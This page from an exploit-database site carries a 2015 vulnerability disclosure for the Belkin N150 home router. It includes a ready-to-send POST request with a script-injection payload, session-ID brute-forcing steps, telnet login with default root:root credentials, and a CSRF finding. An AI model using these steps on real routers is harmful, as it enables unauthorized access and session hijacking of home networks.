0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Belkin N150 XSS / CSRF / Session Hijacking Vulnerabilities
##Full Disclosure: #Exploit Title : Belkin N150 Wireless Home Router Multiple Vulnerabilities #Exploit Author : Rahul Pratap Singh #Date : 30/Nov/2015 #Home Page Link : http://www.belkin.com #Blog Url : 0x62626262.wordpress.com #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94 #Status : Not Patched → Vulnerability/BUG Report : 1) • Vulnerability Title : HTML/Script Injection • Version : F9K1009 v1 • Firmware : 1.00.09 → Proof of Concept: "InternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language" this parameter is vulnerable. https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/ → Steps to Reproduce: Send the following post request using Burpsuite,etc POST /cgi-bin/webproc HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=- Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 260 %3AInternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language="><script>alert("1")</script><script>"&obj-action=set&var%3Apage=deviceinfo&var%3Aerrorpage=deviceinfo&getpage=html%2Findex.html&errorpage=html%2Findex.html&var%3ACacheLastData=U1BBTl9UaW1lTnVtMT0%3D 2) • Vulnerability Title : Session Hijacking • Version : F9K1009 v1 • Firmware : 1.00.09 → Proof of Concept: Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT sessionid is allocated using hex encoding and of fixed length i.e 8 . Therefore, it is very easy to bruteforce it in feasible amount for time as this session id ranges from 00000000 to ffffffff → Steps to Reproduce: Send the following request using Burpsuite and Bruteforce the sessionid. POST /cgi-bin/webproc HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=- Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT 3) • Vulnerability Title : Telnet Enabled with Default Pass • Version : F9K1009 v1 • Firmware : 1.00.09 → Vulnerability Details: Telnet protocol can be used by an attacker to gain remote access to the router with root privileges. → Proof of Concept: https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/ → Steps to Reproduce: 1) Open terminal 2) Type following command: telnet 192.168.2.1 3) Default user and pass is root:root 4) • Vulnerability Title : Cross Site Request Forgery • Version : F9K1009 v1 • Firmware : 1.00.09 → Proof of Concept: Request doesn't contain any CSRF-token. Therefore, requests can be forged. It can be verified with any request. Status: Vendor Notified: 20 Oct 2015 Vendor Notified Again: 25 Nov 2015 # 0day.today [2024-12-24] #